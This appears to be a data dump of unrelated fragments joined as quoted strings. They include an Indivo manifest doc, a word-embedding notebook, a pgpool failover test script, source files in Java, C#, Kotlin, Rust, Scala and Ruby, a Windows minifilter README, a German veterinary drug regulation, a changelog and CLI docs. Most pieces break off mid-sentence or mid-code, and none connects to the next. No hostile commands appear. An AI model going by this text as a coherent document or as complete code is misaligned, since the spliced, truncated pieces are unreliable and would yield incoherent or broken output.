manifest. \n\nSee `The SMART Project's documentation \n<http://wiki.chip.org/smart-project/index.php/Developers_Documentation:_Packaging_Applications_via_SMART_Manifest>`_ \nfor a description of the basic syntax of a manifest, which is JSON based. Below, we describe only the Indivo-specific\nmodifications.\n\nUser Apps\n^^^^^^^^^\n\nNew Fields\n\"\"\"\"\"\"\"\"\"\"\n\nAn Indivo user-app may define (beyond the SMART-supported manifest fields) any of the following additional properties in\nits manifest:\n\n* *oauth_callback_url*: A callback URL for Indivo-style oAuth access\n* *autonomous_reason*: An explanation for why the app requires offline access to patient records" +"{\n \"cells\": [\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"# Continuous Bag of words\\n\",\n \"\\n\",\n \"\\n\",\n \"Let us say we have a neural network with one input, hidden and output layer. The goal of\\n\",\n \"the network is to predict a word given its surrounding words. The word which we are\\n\",\n \"trying to predict is called the target word and the word surrounding the target word is\\n\",\n \"called the context words.\\n\",\n \"\\n\",\n \"How many number of context words we use to predict the target word? We use a window\\n\",\n \"of size to choose the context word. If the window size is 2 then we use two words before\\n\",\n \"and two words after the target word as the context words.\\n\",\n \"\\n\",\n \"Let us consider the sentence 'The sun rises in the east' with the word 'rises' as the target word. \\n\",\n \"\\n\",\n \"\\n\",\n \"If we set\\n\",\n \"the window size =2 then we take the words 'the' and 'sun' which are the two words before\\n\",\n \"and 'in' and 'the' which are the two words after to the target word 'rises' as context words as\\n\",\n \"shown below:\\n\",\n \"\\n\",\n \"![image](images/1_1.png)\\n\",\n \"\\n\",\n \"So the input to the network is context words and output is a" +"#!/usr/bin/env bash\n\ndocker-compose up -d pgmaster pgslave1 pgslave2 pgslave3 pgpool\n\ndocker-compose exec -T pgmaster wait_local_postgres\ndocker-compose exec -T pgslave1 wait_local_postgres\ndocker-compose exec -T pgslave2 wait_local_postgres\ndocker-compose exec -T pgslave3 wait_local_postgres\nsleep 20\ndocker-compose kill pgslave3\n\n# Generate some load\nfor i in `seq 1 50`; do\n docker-compose exec -T pgpool bash -c 'PGCONNECT_TIMEOUT=10 PGPASSWORD=$CHECK_PASSWORD psql -U $CHECK_USER -h 127.0.0.1 template1 -c \"SELECT 1;\"' ;\ndone\n\n\n#Calculate delay for node to be marked as down\n# health_check_period + health_check_max_retries*(health_check_timeout + health_check_retry_delay)\n# 30 + 5 * (10 + 5) = 105 (+ some time)\n\nsleep 180\n\nNODE_IS_OUT=`docker-compose exec -T pgpool bash -c 'PGCONNECT_TIMEOUT=10 PGPASSWORD=$CHECK_PASSWORD psql -U $CHECK_USER -h 127.0.0.1 template1 -c \"show pool_nodes\"' | grep pgslave3 | awk -F\"|\" '{print $4}' | grep 'down\\|3' | wc -l | tr -d ' '`\nif [[ \"$NODE_IS_OUT\" != \"1\" ]]; then\n echo \">>> Node should be removed from pgpool!\"\nfi" +"package cn.zifangsky.mqwebsocket.service;\n\nimport cn.zifangsky.mqwebsocket.model.User;\n\nimport java.util.Map;\n\n/**\n * \u7528\u4e8e\u76f8\u5173Service\n * @author zifangsky\n * @date 2018/7/27\n * @since 1.0.0\n */\npublic interface UserService {\n /**\n * \u901a\u8fc7\u7528\u6237ID\u67e5\u8be2\u7528\u6237\u4fe1\u606f\n * @author zifangsky\n * @date 2018/8/23 15:07\n * @since 1.0.0\n * @param userId \u7528\u6237ID\n * @return cn.zifangsky.model.User\n */\n User selectByUserId(Integer userId);\n\n /**\n * \u6ce8\u518c\n * @author zifangsky\n * @date 2018/7/27 10:48\n * @since 1.0.0\n * @param user \u7528\u6237\u8be6\u60c5\n * @return boolean\n */\n boolean register(User user);\n\n /**\n * \u767b\u5f55\u6821\u9a8c\n * @author zifangsky\n * @date 2018/7/27 10:48\n * @since 1.0.0\n * @param username \u7528\u6237\u540d\n * @param password \u5bc6\u7801\n * @return java.util.Map<java.lang.String,java.lang.Object>\n */\n Map<String,Object> checkLogin(String username, String password);\n\n /**\n * \u7ed9\u7528\u6237\u6dfb\u52a0\u89d2\u8272\u4fe1\u606f\n * @author zifangsky\n * @date 2018/8/10 17:30\n * @since 1.0.0\n * @param userId \u7528\u6237ID\n * @param roleName \u89d2\u8272\u540d\n */\n void addUserRole(Integer userId, String roleName);\n\n}" +"\ufeffusing System;\r\nusing System.Linq;\r\nusing System.IO;\r\n\r\nnamespace Snappy.Sharp\r\n{\r\n public static class Snappy\r\n {\r\n internal const int LITERAL = 0;\r\n internal const int COPY_1_BYTE_OFFSET = 1; // 3 bit length + 3 bits of offset in opcode\r\n internal const int COPY_2_BYTE_OFFSET = 2;\r\n internal const int COPY_4_BYTE_OFFSET = 3;\r\n\r\n public static int MaxCompressedLength(int sourceLength)\r\n {\r\n var compressor = new SnappyCompressor();\r\n return compressor.MaxCompressedLength(sourceLength);\r\n }\r\n\r\n public static byte[] Compress(byte[] uncompressed)\r\n {\r\n var target = new SnappyCompressor();\r\n var result = new byte[target.MaxCompressedLength(uncompressed.Length)];\r\n var count = target.Compress(uncompressed, 0, uncompressed.Length, result);\r\n return result.Take(count).ToArray();\r\n }\r\n\r\n public static void Compress(Stream uncompressed, SnappyStream compressed)\r\n {\r\n throw new NotImplementedException();\r\n }\r\n\r\n public static int GetUncompressedLength(byte[] compressed, int offset = 0)\r\n {\r\n var decompressor = new SnappyDecompressor();\r\n return decompressor.ReadUncompressedLength(compressed, offset)[0];\r\n }\r\n\r\n public static byte[] Uncompress(byte[] compressed)\r\n {\r\n throw new NotImplementedException();\r\n }\r\n\r\n public static void Uncompress(SnappyStream compressed, StreamWriter uncompressed)\r\n {\r\n throw new NotImplementedException();\r\n }\r\n }\r\n}" +"\ufeffusing System;\r\nusing System.Collections;\r\nusing System.Collections.Generic;\r\nusing System.Text;\r\nusing Illumina.Common.FileSystem;\r\nusing Isas.SequencingFiles;\r\n\r\nnamespace FlagUniqueKmers\r\n{\r\n class KmerChecker\r\n {\r\n #region Members\r\n static private int KmerLength = 35;\r\n static private int MaxDictEntries = 400000000; // We can go up this high, given the updates to app.config.\r\n Dictionary<string, long> Kmers = new Dictionary<string, long>(); // Dictionary: Kmer string -> first occurrence of the kmer in the genome\r\n List<BitArray> ChromosomeNonUniqueFlags = new List<BitArray>();\r\n List<BitArray> ChromosomeFinishedFlags = new List<BitArray>();\r\n private int PassIndex;\r\n private long GenomePosition;\r\n private long IncompletePositions;\r\n StringBuilder keyBuilder = new StringBuilder();\r\n #endregion\r\n\r\n /// <summary>\r\n /// Return the key for this kmer:\r\n /// - null, if it contains Ns\r\n /// - otherwise, compress both the string and its reverse complement to a short (more memory-efficient) string,\r\n /// and return the first of the two.\r\n /// </summary>\r\n private string GetKeyForKmer(string kmer)\r\n {\r\n\r\n // Squish the kmer to a more byte-efficient representation:\r\n // 35 bases at 1 byte per character = 280 bits\r\n // using 2 bits per base, 35 bases can be encoded as 35*2=70 bits, which fits in 9 bytes.\r\n keyBuilder.Clear();\r\n byte currentChar = 0;\r\n bool badChar = false;\r\n for (int tempChar = 0; tempChar < kmer.Length; tempChar++)\r\n {\r\n currentChar *= 4;\r\n switch (kmer[tempChar])" +"import React, { Component, PropTypes } from 'react';\nimport { connect } from 'react-redux';\n\nimport Shortcuts from '../widgets/shortcuts';\nimport Status from '../widgets/status';\n\n\nclass App extends Component {\n\n static propTypes = {\n children: PropTypes.node,\n status: PropTypes.string,\n shortcuts: PropTypes.array,\n };\n\n static contextTypes = {\n theme: PropTypes.object.isRequired,\n };\n\n render () {\n const { children, status } = this.props;\n const { theme } = this.context;\n const shortcuts = [\n { key: 'q', label: 'Quit' },\n { key: 'escape', label: 'Back' },\n ...this.props.shortcuts,\n ];\n return (\n <box position={{ top: 0, left: 0, bottom: 0, right: 0 }} style={theme.header}>\n <text style={theme.header} content=\" SQLECTRON\" />\n <box position={{ top: 1, left: 0, right: 0, bottom: 2 }} style={theme.main}>\n {children}\n </box>\n <Status status={status} />\n <Shortcuts shortcuts={shortcuts} />\n </box>\n );\n }\n}\n\n\nexport default connect(\n state => ({\n status: state.status,\n shortcuts: state.shortcuts,\n })\n)(App);" +"#!/usr/bin/env bash\n\n# Clear the terminal so we can see things\ntput clear\n\n# Source terminal colors\n. ./colors\n# Source error trap\n. ./error_trap\n# Source variables\n. ./variables\n# Source functions\n. ./functions\n# Source whiptail messages\n. ./messages\n\nchk_version\n\n# Reset GETOPTS\nOPTIND=1\n\n# Set overlap variables\nDEPENDENCIES+=\"bc build-essential gnupg libnotify-bin libssl-dev pkg-config \\\n\t\t\t\ttime bison flex \"\n\n# shellcheck disable=SC2034\nBASEURL=kernel.org\n\nif ! [[ $# == 0 ]]; then\n\t\tif ! [[ $1 =~ ^- ]]; then\n\t\techo -e \"DEPRICATED: Please use the standard argument form.\\n\"\n\t\techo -e \"Example: ${Yellow}./${0##*/} --latest${Reg}\\n\"\n\t\techo -e \"Try ${Yellow}--help${Reg} for more information.\\n\"\n\t\texit 1\n\tfi\nfi\n\n# Parse arguments\nparse_opts_comp \"$@\"\n\n# shellcheck disable=SC2154\nwhip_msg \"${w_title_one}\" \"${w_msg_one}\"\n\n# Check if launched as root user\nchk_root\n\n# If not root, check member os sudo\nif [[ $EUID -ne 0 ]]; then\n\tchk_sudoer\nfi\n\necho -e \"${PLUS} Checking Dependencies\"\n\n# Configure dependencies basted on local / remote\nset_deps\n\n# Check all deps are installed\nchk_deps\n\nif ! [ $LOCALFILE ]; then\n\tselect_kernel_deb\n\tget_kernel_archive\n\tcheck_sign\nfi\n\necho -e \"${PLUS} Creating a directory to build your kernel from source.\"\nmkdir \"$CMP_FLDR\" 2>/dev/null || error ${LINENO} \"You cannot create a directory here.\" 1\n# shellcheck" +"---\npage_type: sample\ndescription: \"A file data scanner example. Typically, anti-virus filters are of this type.\"\nlanguages:\n- cpp\nproducts:\n- windows\n- windows-wdk\n---\n\n# Scanner File System Minifilter Driver\n\nThe Scanner minifilter is an example for developers who intend to write filters that examine data in files. Typically, antivirus products fall into this category.\n\n## Universal Windows Driver Compliant\n\nThis sample builds a Universal Windows Driver. It uses only APIs and DDIs that are included in OneCoreUAP.\n\n## Design and Operation\n\nThe Scanner minifilter comprises both kernel-mode and user-mode components. The kernel-mode component recognizes appropriate moments for scanning a file's data and passes it to the user-mode component for further validation. The user-mode component creates a number of threads that await validation requests and corresponding data from the kernel-mode component. After scanning the data for occurrences of a \"foul\" string, the user-mode component sends an appropriate response to the kernel-mode component.\n\nThe kernel-mode component scans files with specific extensions only. The file is first scanned on a successful open. If the file was opened with write access, it is scanned again before a close. Scanning is also performed on data that is about to be written to a" +"// Targeted by JavaCPP version 1.5.4: DO NOT EDIT THIS FILE\n\npackage org.bytedeco.systems.windows;\n\nimport java.nio.*;\nimport org.bytedeco.javacpp.*;\nimport org.bytedeco.javacpp.annotation.*;\n\nimport static org.bytedeco.javacpp.presets.javacpp.*;\n\nimport static org.bytedeco.systems.global.windows.*;\n\n\n//\n// Where:\n//\n// SE_OWNER_DEFAULTED - This boolean flag, when set, indicates that the\n// SID pointed to by the Owner field was provided by a\n// defaulting mechanism rather than explicitly provided by the\n// original provider of the security descriptor. This may\n// affect the treatment of the SID with respect to inheritence\n// of an owner.\n//\n// SE_GROUP_DEFAULTED - This boolean flag, when set, indicates that the\n// SID in the Group field was provided by a defaulting mechanism\n// rather than explicitly provided by the original provider of\n// the security descriptor. This may affect the treatment of\n// the SID with respect to inheritence of a primary group.\n//\n// SE_DACL_PRESENT - This boolean flag, when set, indicates that the\n// security descriptor contains a discretionary ACL. If this\n// flag is set and the Dacl field of the SECURITY_DESCRIPTOR is\n// null, then a null ACL is explicitly being specified.\n//\n// SE_DACL_DEFAULTED - This boolean flag, when set, indicates that the\n// ACL pointed to by" +"import * as spec from '@jsii/spec';\nimport * as api from './api';\nimport { EMPTY_OBJECT_FQN } from './serialization';\n\n/**\n * Symbol under which we store the { type -> objid } map on object instances\n */\nconst OBJID_SYMBOL = Symbol.for('$__jsii__objid__$');\n\n/**\n * Symbol under which we store the interfaces implemented by instances\n */\nconst IFACES_SYMBOL = Symbol.for('$__jsii__interfaces__$');\n\n/**\n * Symbol we use to tag the constructor of a JSII class\n */\nconst JSII_SYMBOL = Symbol.for('__jsii__');\n\n/**\n * Get the JSII fqn for an object (if available)\n *\n * This will return something if the object was constructed from a JSII-enabled\n * class/constructor, or if a literal object was annotated with type\n * information.\n */\nexport function jsiiTypeFqn(obj: any): string | undefined {\n return obj.constructor[JSII_SYMBOL]?.fqn;\n}\n\n/**\n * If this object was previously serialized under a given reference, return the same reference\n *\n * This is to retain object identity across invocations.\n */\nexport function objectReference(obj: unknown): api.AnnotatedObjRef | undefined {\n // If this object as already returned\n if ((obj as any)[OBJID_SYMBOL]) {\n return {\n [api.TOKEN_REF]: (obj as ManagedObject)[OBJID_SYMBOL],\n [api.TOKEN_INTERFACES]: (obj as ManagedObject)[IFACES_SYMBOL],\n };\n }\n\n return undefined;\n}\n\ntype ManagedObject = {\n [OBJID_SYMBOL]: string;\n [IFACES_SYMBOL]?: string[];\n};\n\nfunction tagObject(obj: unknown, objid:" +"source: Developing/Merging-Pull-Requests.md\npath: blob/master/doc/\n\n# Merging Pull Requests\n\n### GitHub\n\nWe will now build the monthly change log from our GitHub commits. When\nmerging a commit, please ensure you:\n\n- Click the `Merge pull request` button\n- Give the merge a descriptive but short title\n- For the commit message prepend it with one of the following tags for\n the pull request to appear in the changelog:\n - devices: or newdevice: For new device support.\n - feature: or feat: To indicate this is a new or updated feature\n - webui: or web: To indicate this is an update to the WebUI\n - fix: or bugfix: To show this is a bug fix.\n - refactoring: or refactor: When the changes are refactoring a large\n portion of code\n- You can reference an issue number with `#xyz`, i.e `#1234`\n- Use the `Confirm squash and merge` button to merge.\n\n### Example commits\n\n#### Feature\n\nfeature: Added new availability map #4401\n\n#### New device\n\nnewdevice: Added support for Cisco ASA #4402" +"package xyz.nulldev.androidcompat.service\n\nimport android.app.Service\nimport android.content.Context\nimport android.content.Intent\nimport mu.KotlinLogging\nimport java.util.concurrent.ConcurrentHashMap\nimport kotlin.concurrent.thread\n\n/**\n * Service emulation class\n *\n * TODO Possibly handle starting services via bindService\n */\n\nclass ServiceSupport {\n val runningServices = ConcurrentHashMap<String, Service>()\n\n private val logger = KotlinLogging.logger {}\n\n fun startService(context: Context, intent: Intent) {\n val name = intentToClassName(intent)\n\n logger.debug { \"Starting service: $name\" }\n\n val service = serviceInstanceFromClass(name)\n\n runningServices.put(name, service)\n\n //Setup service\n thread {\n callOnCreate(service)\n //TODO Handle more complex cases\n service.onStartCommand(intent, 0, 0)\n }\n }\n\n fun stopService(context: Context, intent: Intent) {\n val name = intentToClassName(intent)\n stopService(name)\n }\n\n fun stopService(name: String) {\n logger.debug { \"Stopping service: $name\" }\n val service = runningServices.remove(name)\n if(service == null) {\n logger.warn { \"An attempt was made to stop a service that is not running: $name\" }\n } else {\n thread {\n service.onDestroy()\n }\n }\n }\n\n fun stopSelf(service: Service) {\n stopService(service.javaClass.name)\n }\n\n fun callOnCreate(service: Service) = service.onCreate()\n\n fun intentToClassName(intent: Intent) = intent.component.className!!\n\n fun serviceInstanceFromClass(className: String): Service {\n val clazzObj = Class.forName(className)\n return clazzObj.newInstance() as? Service\n ?: throw IllegalArgumentException(\"$className is not a Service!\")\n }\n}" +"#\n# This script generates CSV output reporting on the API Coverage of Terraform's\n# AWS Provider.\n#\n# In addition to Ruby, it depends on a properly configured Go development\n# environment with both terraform and aws-sdk-go present.\n#\n\nrequire 'csv'\nrequire 'json'\nrequire 'pathname'\n\nmodule APIs\n module Terraform\n def self.path\n @path ||= Pathname(`go list -f '{{.Dir}}' github.com/hashicorp/terraform`.chomp)\n end\n\n def self.called?(api, op)\n `git -C \"#{path}\" grep \"#{api}.*#{op}\" -- builtin/providers/aws | wc -l`.chomp.to_i > 0\n end\n end\n\n module AWS\n def self.path\n @path ||= Pathname(`go list -f '{{.Dir}}' github.com/aws/aws-sdk-go/aws`.chomp).parent\n end\n\n def self.api_json_files\n Pathname.glob(path.join('**', '*.normal.json'))\n end\n\n def self.each\n api_json_files.each do |api_json_file|\n json = JSON.parse(api_json_file.read)\n api = api_json_file.dirname.basename\n json[\"operations\"].keys.each do |op|\n yield api, op\n end\n end\n end\n end\nend\n\ncsv = CSV.new($stdout)\ncsv << [\"API\", \"Operation\", \"Called in Terraform?\"]\nAPIs::AWS.each do |api, op|\n csv << [api, op, APIs::Terraform.called?(api, op)]\nend" +"package scala.collection.parallel.benchmarks.parallel_array\n\n\n\n\nobject CountList extends Companion {\n def benchName = \"count-list\";\n def apply(sz: Int, parallelism: Int, what: String) = new CountList(sz, parallelism, what)\n override def comparisons = List(\"jsr\")\n override def defaultSize = 1000\n \n val listCreator = (i: Int) => (0 until (i % 50 + 50)).toList\n val pred = (lst: List[Int]) => check(lst)\n val predjsr = new extra166y.Ops.Predicate[List[Int]] {\n def op(lst: List[Int]) = check(lst)\n }\n \n def check(lst: List[Int]) = lst.foldLeft(0)((sum, n) => sum + n * n) % 2 == 0\n}\n\nclass CountList(sz: Int, p: Int, what: String)\nextends Resettable(sz, p, what, CountList.listCreator, new Array[Any](_), classOf[List[Int]]) {\n def companion = CountList\n override def repetitionsPerRun = 250\n \n def runpar = pa.count(CountList.pred)\n def runseq = sequentialCount(CountList.pred, sz)\n def runjsr = jsrarr.withFilter(CountList.predjsr).size\n def comparisonMap = collection.Map(\"jsr\" -> runjsr _)\n}" +"<H2>Description</H2>\n<P>This track shows locations of Sequence Tagged Sites (STS) \nalong the rat draft assembly. These markers have been mapped using \neither genetic (Rat FHH x ACI F2 Intercross Genetic Map, Rat SHRSP x BN F2 Intercross Genetic Map)\nor radiation hybridization (RH Map 2.2) mapping techniques.</P>\n<P>\nAdditional data on the individual maps can be found at the following links:\n<UL>\n<LI>NCBI UniSTS (now part of NCBI <a href=\"https://www.ncbi.nlm.nih.gov/probe\" target=\"_blank\">Probe</a>)\n<LI><A href=\"https://rgd.mcw.edu/\" TARGET=_blank> Rat Genome Database</A>\n</UL><P>\n\n<P>By default all genetic map markers are shown as blue; only radiation\nhybrid markers and markers that are neither genetic nor radiation hybrid\nare shown as black; markers that map to more than one position are\nshown in lighter colors. Users can choose a color to highlight a subset\nof markers of interest from the Filter options in STS Markers\nTrack Setting page.\n\n<H2>Using the Filter</H2>\n<P>The track filter can be used to change the color or include/exclude\na set of map data within the track. This is helpful when many items\nare shown in the track display, especially when only some are relevant\nto the current task. To use the filter:\n<UL>\n<LI>In the pulldown menu, select the map whose data" +"package org.zalando.logbook.logstash;\n\nimport com.fasterxml.jackson.core.JsonFactory;\nimport com.fasterxml.jackson.core.JsonGenerator;\nimport com.fasterxml.jackson.core.JsonParser;\nimport com.fasterxml.jackson.core.PrettyPrinter;\nimport net.logstash.logback.marker.RawJsonAppendingMarker;\nimport org.apiguardian.api.API;\nimport org.slf4j.Marker;\n\nimport java.io.IOException;\n\nimport static org.apiguardian.api.API.Status.INTERNAL;\n\n/**\n * Auto-detecting pretty-printing {@link Marker}. If pretty-printing is enabled,\n * indents using the log framework's own {@link JsonGenerator}.\n */\n@API(status = INTERNAL)\nfinal class AutodetectPrettyPrintingMarker extends RawJsonAppendingMarker {\n\n private static final long serialVersionUID = 1L;\n\n AutodetectPrettyPrintingMarker(final String fieldName, final String rawJson) {\n super(fieldName, rawJson);\n }\n\n @Override\n protected void writeFieldValue(final JsonGenerator generator) throws IOException {\n final PrettyPrinter prettyPrinter = generator.getPrettyPrinter();\n\n if (prettyPrinter == null) {\n super.writeFieldValue(generator);\n } else {\n final JsonFactory factory = generator.getCodec().getFactory();\n\n // append to existing tree event by event\n try (final JsonParser parser = factory.createParser(super.getFieldValue().toString())) {\n while (parser.nextToken() != null) {\n generator.copyCurrentEvent(parser);\n }\n }\n }\n }\n\n}" +"# TensorBoard in PyTorch\n\nIn this tutorial, we implement a MNIST classifier using a simple neural network and visualize the training process using [TensorBoard](https://www.tensorflow.org/get_started/summaries_and_tensorboard). In training phase, we plot the loss and accuracy functions through `scalar_summary` and visualize the training images through `image_summary`. In addition, we visualize the weight and gradient values of the parameters of the neural network using `histogram_summary`. PyTorch code for handling these summary functions can be found [here](https://github.com/yunjey/pytorch-tutorial/blob/master/tutorials/04-utils/tensorboard/main.py#L81-L97).\n\n![alt text](gif/tensorboard.gif)\n\n<br>\n\n## Usage \n\n#### 1. Install the dependencies\n```bash\n$ pip install -r requirements.txt\n```\n\n#### 2. Train the model\n```bash\n$ python main.py\n```\n\n#### 3. Open the TensorBoard\nTo run the TensorBoard, open a new terminal and run the command below. Then, open http://localhost:6006/ on your web browser.\n```bash\n$ tensorboard --logdir='./logs' --port=6006\n```" +"# MemberMapData Class\n\nNamespace: [CsvHelper.Configuration](/api/CsvHelper.Configuration)\n\nThe configured data for the member map.\n\n```cs\npublic class MemberMapData \n```\n\nInheritance Object -> MemberMapData\n\n## Constructors\n  |  \n- | -\nMemberMapData(MemberInfo) | Initializes a new instance of the ``CsvHelper.Configuration.MemberMapData`` class.\n\n## Properties\n  |  \n- | -\nConstant | Gets or sets the constant value used for every record.\nDefault | Gets or sets the default value used when a CSV field is empty.\nIgnore | Gets or sets a value indicating whether the field should be ignored.\nIndex | Gets or sets the column index.\nIndexEnd | Gets or sets the index end. The Index end is used to specify a range for use with a collection member. Index is used as the start of the range, and IndexEnd is the end of the range.\nIsConstantSet | Gets or sets a value indicating if a constant was explicitly set.\nIsDefaultSet | Gets or sets a value indicating whether this instance is default value set. the default value was explicitly set. True if it was explicitly set, otherwise false.\nIsIndexSet | Gets or sets a value indicating if the index was explicitly set. True if it was explicitly set, otherwise" +"# Changelog\n\nAll notable changes to `laravel-flash` will be documented in this file\n\n## 1.7.0 - 2020-09-08\n\n- add support for Laravel 8\n\n## 1.6.0 - 2020-03-18\n\n- add `level` property on `flash()`\n\n## 1.5.0 - 2020-03-01\n\n- add support for Laravel 7\n\n## 1.4.0 - 2019-12-08\n\n- drop support for PHP 7.3\n\n## 1.3.0 - 2019-09-04\n\n- add support for Laravel 6\n\n## 1.2.1 - 2019-03-15\n\n- fix circular reference\n\n## 1.2.0 - 2019-03-14\n\n- the second parameter of `flash` will now lookup a preregistered macro\n\n## 1.1.0 - 2019-03-14\n\n- add `levels` method\n\n## 1.0.0 - 2019-03-14\n\n- initial release" +"require 'puppet/util/inifile'\n\nPuppet::Type.type(:yumrepo).provide(:inifile) do\n desc <<-EOD\n Manage yum repo configurations by parsing yum INI configuration files.\n\n ### Fetching instances\n\n When fetching repo instances, directory entries in '/etc/yum/repos.d',\n '/etc/yum.repos.d', and the directory optionally specified by the reposdir\n key in '/etc/yum.conf' will be checked. If a given directory does not exist it\n will be ignored. In addition, all sections in '/etc/yum.conf' aside from\n 'main' will be created as sections.\n\n ### Storing instances\n\n When creating a new repository, a new section will be added in the first\n yum repo directory that exists. The custom directory specified by the\n '/etc/yum.conf' reposdir property is checked first, followed by\n '/etc/yum/repos.d', and then '/etc/yum.repos.d'. If none of these exist, the\n section will be created in '/etc/yum.conf'.\n EOD\n\n PROPERTIES = Puppet::Type.type(:yumrepo).validproperties\n\n # Retrieve all providers based on existing yum repositories\n #\n # @api public\n # @return [Array<Puppet::Provider>] providers generated from existing yum\n # repository definitions.\n def self.instances\n instances = []\n\n virtual_inifile.each_section do |section|\n # Ignore the 'main' section in yum.conf since it's not a repository.\n next if section.name == \"main\"\n\n attributes_hash = {:name => section.name, :ensure => :present, :provider => :yumrepo}\n\n section.entries.each do |key, value|\n key = key.to_sym\n if valid_property?(key)\n attributes_hash[key] = value\n elsif key == :name\n attributes_hash[:descr]" +"---\nTitle: Verordnung \u00fcber Stoffe mit pharmakologischer Wirkung\njurabk: PharmStV\nlayout: default\norigslug: pharmstv\nslug: pharmstv\n\n---\n\n# Verordnung \u00fcber Stoffe mit pharmakologischer Wirkung (PharmStV)\n\nAusfertigungsdatum\n: 1977-08-03\n\nFundstelle\n: BGBl I: 1977, 1479\n\nNeugefasst durch\n: Bek. v. 8.7.2009 I 1768\n\n\n## \u00a7 1\n\nDie in Anlage 1 aufgef\u00fchrten Stoffe d\u00fcrfen den in dieser Anlage\nbezeichneten Tieren f\u00fcr die dort genannten Anwendungsgebiete nicht\nzugef\u00fchrt werden.\n\n\n## \u00a7 2\n\nDie in den Anlagen 2 und 3 aufgef\u00fchrten Stoffe, deren Anwendung nicht\nnach \u00a7 1 ausgeschlossen ist, d\u00fcrfen Tieren, die der Gewinnung von\nLebensmitteln dienen, nur zugef\u00fchrt werden, wenn diese Tiere in den\nAnlagen bezeichnet sind. Die Stoffe d\u00fcrfen nur f\u00fcr die dort genannten\nAnwendungsgebiete unter den dort aufgef\u00fchrten Bedingungen zugef\u00fchrt\nwerden, sofern sie\n\n1. als Fertigarzneimittel f\u00fcr die in den Anlagen 2 und 3 genannten\n Anwendungsgebiete zugelassen sind und\n\n\n2. entsprechend der dem Fertigarzneimittel beiliegenden\n Gebrauchsinformation angewendet werden.\n\n\n\n\n\n## \u00a7 3\n\n(1) Lebensmittel, die von Tieren gewonnen wurden, denen Stoffe\nentgegen \u00a7 1 in Verbindung mit Anlage 1 oder entgegen \u00a7 2 in\nVerbindung mit Anlage 2 oder 3 zugef\u00fchrt worden sind, d\u00fcrfen nicht in\nden Verkehr gebracht werden.\n\n(2) Die in Anlage 1 genannten Stoffe d\u00fcrfen f\u00fcr eine nach" +"//! A segment time achieved for a segment. It is tagged with an index. Only\n//! segment times with an index larger than 0 are considered times actually\n//! achieved by the runner, while the others are artifacts of route changes and\n//! similar algorithmic changes.\n\nuse super::output_time;\nuse livesplit_core::Time;\n\n/// type\npub type SegmentHistoryElement = (i32, Time);\n/// type\npub type NullableSegmentHistoryElement = SegmentHistoryElement;\n/// type\npub type OwnedSegmentHistoryElement = Box<SegmentHistoryElement>;\n\n/// Accesses the index of the segment history element.\n#[no_mangle]\npub extern \"C\" fn SegmentHistoryElement_index(this: &SegmentHistoryElement) -> i32 {\n this.0\n}\n\n/// Accesses the segment time of the segment history element.\n#[no_mangle]\npub extern \"C\" fn SegmentHistoryElement_time(this: &SegmentHistoryElement) -> *const Time {\n output_time(this.1)\n}" +"Intersil ISL1209/19 I2C RTC/Alarm chip with event in\n\nISL12X9 have additional pins EVIN and #EVDET for tamper detection, while the\nISL1208 and ISL1218 do not. They are all use the same driver with the bindings\ndescribed here, with chip specific properties as noted.\n\nRequired properties supported by the device:\n - \"compatible\": Should be one of the following:\n\t\t- \"isil,isl1208\"\n\t\t- \"isil,isl1209\"\n\t\t- \"isil,isl1218\"\n\t\t- \"isil,isl1219\"\n - \"reg\": I2C bus address of the device\n\nOptional properties:\n - \"interrupt-names\": list which may contains \"irq\" and \"evdet\"\n\tevdet applies to isl1209 and isl1219 only\n - \"interrupts\": list of interrupts for \"irq\" and \"evdet\"\n\tevdet applies to isl1209 and isl1219 only\n - \"isil,ev-evienb\": Enable or disable internal pull on EVIN pin\n\tApplies to isl1209 and isl1219 only\n\tPossible values are 0 and 1\n\tValue 0 enables internal pull-up on evin pin, 1 disables it.\n\tDefault will leave the non-volatile configuration of the pullup\n\tas is.\n\nExample isl1219 node with #IRQ pin connected to SoC gpio1 pin12 and #EVDET pin\nconnected to SoC gpio2 pin 24 and internal pull-up enabled in EVIN pin.\n\n\tisl1219: rtc@68 {\n\t\tcompatible = \"isil,isl1219\";\n\t\treg = <0x68>;\n\t\tinterrupt-names = \"irq\", \"evdet\";\n\t\tinterrupts-extended = <&gpio1 12 IRQ_TYPE_EDGE_FALLING>,\n\t\t\t<&gpio2 24 IRQ_TYPE_EDGE_FALLING>;\n\t\tisil,ev-evienb" +"\n# Mathematical Optimization\n\nMathematical optimization involves the maximization or minimization of a function through clever choices of the input variables and the analysis of the the output. They are mostly iterative as the underlying function is not easily analysed.\n\nBelow is the comparison of the optimization algorithms that we use and their general use cases.\n\n## Gradient Ascent\n\nGradient Ascent involves using the first order derivative to choose the next point. It will then move in the direction of the fastest increasing or decreasing gradient. As it passes the maximum, the step size decreases. Once the gradient is close enough to zero or the step size is small enough, the optmization algorithm exits.\n\nPros:\n * Very good at finding the the optimum point of a smooth unimodal function.\n * Parallelizable\n * Various configurable attributes to speed up convergence\n\nCons:\n * The gradient must be known at all points.\n * Has trouble with noisy functions\n * Can become stuck in local optimums.\n * Somewhat slow in convergence\n\n## Parallel Gradient Ascent\n\nParallel Gradient Ascent combines multiple independent Gradient Ascents together and operates on them as a set. If two inputs are near to each other, the two Gradient Ascents are combined" +"# Utitliy Commands\n\nGohan provides various utitliy commands.\n\nRun ``gohan -h`` to list available commands\n\n```\nNAME:\n gohan - Gohan\n\nUSAGE:\n gohan [global options] command [command options] [arguments...]\n\nCOMMANDS:\n client\t\t\tManage Gohan resources\n validate, v\t\t\tValidate document\n init-db, idb\t\t\tInitialize DB backend with given schema file\n convert, conv\t\tConvert DB\n server, srv\t\t\tRun API Server\n test_extensions, test_ex\tRun extension tests\n migrate, mig\t\t\tGenerate goose migration script\n template, template\t\tConvert gohan schema using pongo2 template\n run, run\t\t\tRun Gohan script Code\n test, test\t\t\tRun Gohan script Test\n openapi, openapi\t\tConvert gohan schema to OpenAPI\n markdown, markdown\t\tConvert gohan schema to markdown doc\n dot, dot\t\t\tConvert gohan schema to dot file for graphviz\n glace-server, gsrv\t\tRun API Server with graceful restart support\n help, h\t\t\tShows a list of commands or help for one command\n\nGLOBAL OPTIONS:\n --debug, -d\t\tShow debug messages\n --help, -h\t\tshow help\n --version, -v\tprint the version\n```\n\n## Validate\n\n```\n NAME:\n validate - Validate Json Schema file\n\n USAGE:\n command validate [command options] [arguments...]\n\n DESCRIPTION:\n\n\n OPTIONS:\n --schema, -s '../schema/core.json' Json schema path\n --json, -i '../example/example.json' json path\n```\n\n## Template\n\n```\n NAME:\n template - Convert gohan schema using pongo2 